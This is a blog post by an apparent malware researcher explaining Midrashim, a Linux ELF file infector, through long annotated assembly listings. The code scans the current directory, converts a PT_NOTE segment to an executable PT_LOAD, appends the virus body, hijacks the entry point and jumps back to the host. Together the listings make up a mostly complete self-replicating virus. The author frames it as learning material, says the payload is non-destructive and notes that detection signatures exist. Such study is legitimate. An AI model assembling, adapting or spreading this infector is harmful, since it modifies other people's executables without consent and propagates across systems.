Overview
My interest in Assembly language started when I was a kid, mainly because of computer viruses of the DOS
era. I’ve spent countless hours contemplating my first humble collection of source codes and samples (you can find it at https://github.com/guitmz/virii) and to me, it’s cool how flexible and creative one can get with Assembly, even if its learning curve is steep.
I’m an independant malware researcher and wrote this virus to learn and have fun, expanding my knowledge on the several ELF attack/defense techniques and Assembly in general.
The code does not implement any evasion techniques and detection is trivial. Samples were also shared with a few major Antivirus companies prior to the release of this code and signatures were created, such as Linux/Midrashim.A
by ESET. I’m also working on a vaccine which will be available at a later date. I’ll update this post when it’s ready.
The payload is not destructive, as usual. It just prints the harmless lyrics of Ozar Midrashim song to stdout
and the layout of an infected file is the following (full image):
How it works
Midrashim
is a 64 bits Linux infector that targets ELF files in the current directory (non recursively). It relies on the well known PT_NOTE -> PT_LOAD
infection technique and should work on regular and position independent binaries. This method has a high success rate and it’s easy to implement (and detect). Read more about it here.
It will not work on Golang
executables, because those need the PT_NOTE
segment to run properly (infection works, but infected file will segfault after virus execution).
For simplicity’s sake, it makes use of pread64 and pwrite64 to read/write specific locations in the target file when it should use mmap instead, for flexibility and reliability. A few other things could be improved too, like detecting first virus execution with a better approach and more error handling to minimize pitfalls.
I had so many ideas for the payload of Midrashim, from inspiration I got from projects at http://www.pouet.net/ to controlling the terminal with ANSI escape codes (more on that here - which is something I wrote with Midrashim in mind).
Due to lack of free time and given the complexity of implementing such things in Assembly, specially in a code of this nature, I ended up with something simpler and will probably revisit this subject on a future project.
Code
This is my first full assembly infector and should be assembled with FASM x64. Its core functionality consists of:
- Reserving space on stack to store values in memory
- Checking if its virus first run (displays a different payload message if running for the first time)
- Open current directory for reading
- Loop through files in the directory, checking for targets for infection
- Try to infect target file
- Continue looping the directory until no more infection targets are available, then exit
Full code with comments is available at https://github.com/guitmz/midrashim and we’ll now go over each step above with a bit more detail.
If you need help understanding Linux system calls parameters, feel free to visit my new (work in progress) website: https://syscall.sh
The secret of getting ahead is getting started
For the stack buffer, I used r15
register and added the comments below for reference when browsing the code.
Note the values, for example, the ELF header, which is 64 bytes long. Since r15 + 144
represents its start, it should end at r15 + 207
. The values in between are also accounted for, like ehdr.entry
that starts at r15 + 168
, which is 8 bytes long, ends at r15 + 175
.
; r15 + 0 = stack buffer = stat
; r15 + 48 = stat.st_size
; r15 + 144 = ehdr
; r15 + 148 = ehdr.class
; r15 + 152 = ehdr.pad
; r15 + 168 = ehdr.entry
; r15 + 176 = ehdr.phoff
; r15 + 198 = ehdr.phentsize
; r15 + 200 = ehdr.phnum
; r15 + 208 = phdr = phdr.type
; r15 + 212 = phdr.flags
; r15 + 216 = phdr.offset
; r15 + 224 = phdr.vaddr
; r15 + 232 = phdr.paddr
; r15 + 240 = phdr.filesz
; r15 + 248 = phdr.memsz
; r15 + 256 = phdr.align
; r15 + 300 = jmp rel
; r15 + 350 = directory size
; r15 + 400 = dirent = dirent.d_ino
; r15 + 416 = dirent.d_reclen
; r15 + 418 = dirent.d_type
; r15 + 419 = dirent.d_name
; r15 + 3000 = first run control flag
; r15 + 3001 = decoded payload
Reserving stack space is easy, there are different ways of doing it, one is to subtract from rsp
, then just store it in r15
. Also right on start, we store argv0
to r14
(it’s going to be needed next) and we push rdx
and rsp
, which need to be restored before the end of virus execution, so the infected file can run properly.
v_start:
mov r14, [rsp + 8] ; saving argv0 to r14
push rdx
push rsp
sub rsp, 5000 ; reserving 5000 bytes
mov r15, rsp ; r15 has the reserved stack buffer address
To check for the virus first execution, we get argv0
size in bytes and compare to the final virus size, which was stored in V_SIZE
. If greater, it’s not the first run and we set a control value into a place in the stack buffer for later use. This was a last minute addition that it’s not great (but pretty easy to implement and rather obvious).
check_first_run:
mov rdi, r14 ; argv0 to rdi
mov rsi, O_RDONLY
xor rdx, rdx ; not using any flags
mov rax, SYS_OPEN
syscall ; rax contains the argv0 fd
mov rdi, rax
mov rsi, r15 ; rsi = r15 = stack buffer address
mov rax, SYS_FSTAT ; getting argv0 size in bytes
syscall ; stat.st_size = [r15 + 48]
cmp qword [r15 + 48], V_SIZE ; compare argv0 size with virus size
jg load_dir ; if greater, not first run, continue infecting without setting control flag
mov byte [r15 + 3000], FIRST_RUN ; set the control flag to [r15 + 3000] to represent virus first execution
The Wild Hunt
We need to find targets to infect. For that we’ll open the current directory for reading using getdents64 syscall, which will return the number of entries in it. That goes into the stack buffer.
load_dir:
push "." ; pushing "." to stack (rsp)
mov rdi, rsp ; moving "." to rdi
mov rsi, O_RDONLY
xor rdx, rdx ; not using any flags
mov rax, SYS_OPEN
syscall ; rax contains the fd
pop rdi
cmp rax, 0 ; if can't open file, exit now
jbe v_stop
mov rdi, rax ; move fd to rdi
lea rsi, [r15 + 400] ; rsi = dirent = [r15 + 400]
mov rdx, DIRENT_BUFSIZE ; buffer with maximum directory size
mov rax, SYS_GETDENTS64
syscall ; dirent contains the directory entries
test rax, rax ; check directory list was successful
js v_stop ; if negative code is returned, I failed and should exit
mov qword [r15 + 350], rax ; [r15 + 350] now holds directory size
mov rax, SYS_CLOSE ; close source fd in rdi
syscall
xor rcx, rcx ; will be the position in the directory entries
Now the hunt gets a little more… wild, as we loop through each file from directory listing we just performed. Steps performed:
- Open target file
- Validate that it’s an ELF and 64 bits (by verifying its magic number and class information from its header)
- Check if already infected (by looking for the infection mark that should be set in
ehdr.pad
) and- if yes, move to next file, until all files in the directory are checked
- If not, loop through the target Program Headers, looking for a
PT_NOTE
section, starting the infection process upon finding it
file_loop:
push rcx ; preserving rcx
cmp byte [rcx + r15 + 418], DT_REG ; check if it's a regular file dirent.d_type = [r15 + 418]
jne .continue ; if not, proceed to next file
.open_target_file:
lea rdi, [rcx + r15 + 419] ; dirent.d_name = [r15 + 419]
mov rsi, O_RDWR
xor rdx, rdx ; not using any flags
mov rax, SYS_OPEN
syscall
cmp rax, 0 ; if can't open file, exit now
jbe .continue
mov r9, rax ; r9 contains target fd
.read_ehdr:
mov rdi, r9 ; r9 contains fd
lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144]
mov rdx, EHDR_SIZE ; ehdr.size
mov r10, 0 ; read at offset 0
mov rax, SYS_PREAD64
syscall
.is_elf:
cmp dword [r15 + 144], 0x464c457f ; 0x464c457f means .ELF (little-endian)
jnz .close_file ; not an ELF binary, close and continue to next file if any
.is_64:
cmp byte [r15 + 148], ELFCLASS64 ; check if target ELF is 64bit
jne .close_file ; skipt it if not
.is_infected:
cmp dword [r15 + 152], 0x005a4d54 ; check signature in [r15 + 152] ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size)
jz .close_file ; already infected, close and continue to next file if any
mov r8, [r15 + 176] ; r8 now holds ehdr.phoff from [r15 + 176]
xor rbx, rbx ; initializing phdr loop counter in rbx
xor r14, r14 ; r14 will hold phdr file offset
.loop_phdr:
mov rdi, r9 ; r9 contains fd
lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208]
mov dx, word [r15 + 198] ; ehdr.phentsize is at [r15 + 198]
mov r10, r8 ; read at ehdr.phoff from r8 (incrementing ehdr.phentsize each loop iteraction)
mov rax, SYS_PREAD64
syscall
cmp byte [r15 + 208], PT_NOTE ; check if phdr.type in [r15 + 208] is PT_NOTE (4)
jz .infect ; if yes, start infecting
inc rbx ; if not, increase rbx counter
cmp bx, word [r15 + 200] ; check if we looped through all phdrs already (ehdr.phnum = [r15 + 200])
jge .close_file ; exit if no valid phdr for infection was found
add r8w, word [r15 + 198] ; otherwise, add current ehdr.phentsize from [r15 + 198] into r8w
jnz .loop_phdr ; read next phdr
Reproductive System 101
Did I already mention it was going to get wild? Just kidding, it’s not really that complicated, just long. It goes like this:
- Append the virus code (
v_stop - v_start
) to the target end of file. These offsets will change during different virus executions, so I’m using an old technique that calculates the delta memory offset using thecall
instruction and the value ofrbp
during runtime
.infect:
.get_target_phdr_file_offset:
mov ax, bx ; loading phdr loop counter bx to ax
mov dx, word [r15 + 198] ; loading ehdr.phentsize from [r15 + 198] to dx
imul dx ; bx * ehdr.phentsize
mov r14w, ax
add r14, [r15 + 176] ; r14 = ehdr.phoff + (bx * ehdr.phentsize)
.file_info:
mov rdi, r9
mov rsi, r15 ; rsi = r15 = stack buffer address
mov rax, SYS_FSTAT
syscall ; stat.st_size = [r15 + 48]
.append_virus:
; getting target EOF
mov rdi, r9 ; r9 contains fd
mov rsi, 0 ; seek offset 0
mov rdx, SEEK_END
mov rax, SYS_LSEEK
syscall ; getting target EOF offset in rax
push rax ; saving target EOF
call .delta ; the age old trick
.delta:
pop rbp
sub rbp, .delta
; writing virus body to EOF
mov rdi, r9 ; r9 contains fd
lea rsi, [rbp + v_start] ; loading v_start address in rsi
mov rdx, v_stop - v_start ; virus size
mov r10, rax ; rax contains target EOF offset from previous syscall
mov rax, SYS_PWRITE64
syscall
cmp rax, 0
jbe .close_file
- Patching the target
PT_NOTE
segment- Adjust its type, making it a
PT_LOAD
- Change its flags (making it executable)
- Update its
phdr.vaddr
to point to the virus start (0xc000000 + stat.st_size
) - Account for virus size on
phdr.filesz
andphdr.memsz
- Keep proper alignment
- Adjust its type, making it a
.patch_phdr:
mov dword [r15 + 208], PT_LOAD ; change phdr type in [r15 + 208] from PT_NOTE to PT_LOAD (1)
mov dword [r15 + 212], PF_R or PF_X ; change phdr.flags in [r15 + 212] to PF_X (1) | PF_R (4)
pop rax ; restoring target EOF offeset into rax
mov [r15 + 216], rax ; phdr.offset [r15 + 216] = target EOF offset
mov r13, [r15 + 48] ; storing target stat.st_size from [r15 + 48] in r13
add r13, 0xc000000 ; adding 0xc000000 to target file size
mov [r15 + 224], r13 ; changing phdr.vaddr in [r15 + 224] to new one in r13 (stat.st_size + 0xc000000)
mov qword [r15 + 256], 0x200000 ; set phdr.align in [r15 + 256] to 2mb
add qword [r15 + 240], v_stop - v_start + 5 ; add virus size to phdr.filesz in [r15 + 240] + 5 for the jmp to original ehdr.entry
add qword [r15 + 248], v_stop - v_start + 5 ; add virus size to phdr.memsz in [r15 + 248] + 5 for the jmp to original ehdr.entry
; writing patched phdr
mov rdi, r9 ; r9 contains fd
mov rsi, r15 ; rsi = r15 = stack buffer address
lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208]
mov dx, word [r15 + 198] ; ehdr.phentsize from [r15 + 198]
mov r10, r14 ; phdr from [r15 + 208]
mov rax, SYS_PWRITE64
syscall
cmp rax, 0
jbe .close_file
- Patching the ELF header
- Save original entrypoint for later in
r14
- Update entrypoint to be the same as the patched segment virtual address (
phdr.vaddr
) - Add infection marker string to
ehdr.pad
- Save original entrypoint for later in
.patch_ehdr:
; patching ehdr
mov r14, [r15 + 168] ; storing target original ehdr.entry from [r15 + 168] in r14
mov [r15 + 168], r13 ; set ehdr.entry in [r15 + 168] to r13 (phdr.vaddr)
mov r13, 0x005a4d54 ; loading virus signature into r13 (TMZ in little-endian)
mov [r15 + 152], r13 ; adding the virus signature to ehdr.pad in [r15 + 152]
; writing patched ehdr
mov rdi, r9 ; r9 contains fd
lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144]
mov rdx, EHDR_SIZE ; ehdr.size
mov r10, 0 ; ehdr.offset
mov rax, SYS_PWRITE64
syscall
cmp rax, 0
jbe .close_file
Those who don’t jump will never fly
Deep, right? That’s exacly what we got to do, jump back to the original target entrypoint to continue the host execution.
We’ll use a relative jump, which is represented by the e9
opcode with a with a 32 bit offset, making the whole instruction 5 bytes long (e9 00 00 00 00
).
To create this instruction, we use the following formula, considering the patched phdr.vaddr
from before:
There’s no secret here, we need to write this instruction to the very end of the file, after the recenty added virus body.
.write_patched_jmp:
; getting target new EOF
mov rdi, r9 ; r9 contains fd
mov rsi, 0 ; seek offset 0
mov rdx, SEEK_END
mov rax, SYS_LSEEK
syscall ; getting target EOF offset in rax
; creating patched jmp
mov rdx, [r15 + 224] ; rdx = phdr.vaddr
add rdx, 5
sub r14, rdx
sub r14, v_stop - v_start
mov byte [r15 + 300 ], 0xe9
mov dword [r15 + 301], r14d
; writing patched jmp to EOF
mov rdi, r9 ; r9 contains fd
lea rsi, [r15 + 300] ; rsi = patched jmp in stack buffer = [r15 + 208]
mov rdx, 5 ; size of jmp rel
mov r10, rax ; mov rax to r10 = new target EOF
mov rax, SYS_PWRITE64
syscall
cmp rax, 0
jbe .close_file
mov rax, SYS_SYNC ; commiting filesystem caches to disk
syscall
Payload’s on the way
We’re almost done here, phew! The final bits of code will take care of displaying the text payload to the screen.
- We check if it’s the virus first run (which means it’s not running from inside an infected file) and in case this is true, we print a message to the screen and exit
- If not the first run, we print a different message to the screen, which is encoded using
xor
andadd
instructions. The purpose of this was to prevent the string from showing up in the binary as plain text
cmp byte [r15 + 3000], FIRST_RUN ; checking if custom control flag we set earlier indicates virus first execution
jnz infected_run ; if control flag != 1, it should be running from an infected file, use normal payload
call show_msg ; if control flag == 1, assume virus is being executed for the first time and display a different message
info_msg:
db 'Midrashim by TMZ (c) 2020', 0xa ; not the nicest approach like I mentioned before but quick to implement
info_len = $-info_msg
show_msg:
pop rsi ; info_msg address to rsi
mov rax, SYS_WRITE
mov rdi, STDOUT ; display payload
mov rdx, info_len
syscall
jmp cleanup ; cleanup and exit
infected_run:
; 1337 encoded payload, very hax0r
call payload
msg:
; payload first part
db 0x59, 0x7c, 0x95, 0x95, 0x57, 0x9e, 0x9d, 0x57
db 0xa3, 0x9f, 0x92, 0x57, 0x93, 0x9e, 0xa8, 0xa3
db 0x96, 0x9d, 0x98, 0x92, 0x57, 0x7e, 0x57, 0x98
db 0x96, 0x9d, 0x57, 0xa8, 0x92, 0x92, 0x57, 0x96
...
len = $-msg
payload:
pop rsi ; setting up decoding loop
mov rcx, len
lea rdi, [r15 + 3001]
.decode:
lodsb ; load byte from rsi into al
sub al, 50 ; decoding it
xor al, 5
stosb ; store byte from al into rdi
loop .decode ; sub 1 from rcx and continue loop until rcx = 0
lea rsi, [r15 + 3001] ; decoded payload is at [r15 + 3000]
mov rax, SYS_WRITE
mov rdi, STDOUT ; display payload
mov rdx, len
syscall
Demo
Outro
This ended up being one of my longest projects. I remember coming back to it multiple times during a period of months, sometimes because I was stuck and had to do research and, other times, the Assembly logic fell into oblivion and took me a moment to get back on track with my thoughts.
Many consider Assembly and ELF injection an art form (myself included) and over the decades, new techniques were developed and improved. It’s essential to talk about these and share the knowledge in order to improve the detection of threat actors, which are starting to realize more and more that Linux seems to not be yet a priority of security companies.
In the end, it was one of the most fun and rewarding codes I ever wrote, albeit not really being one of the best.
TMZ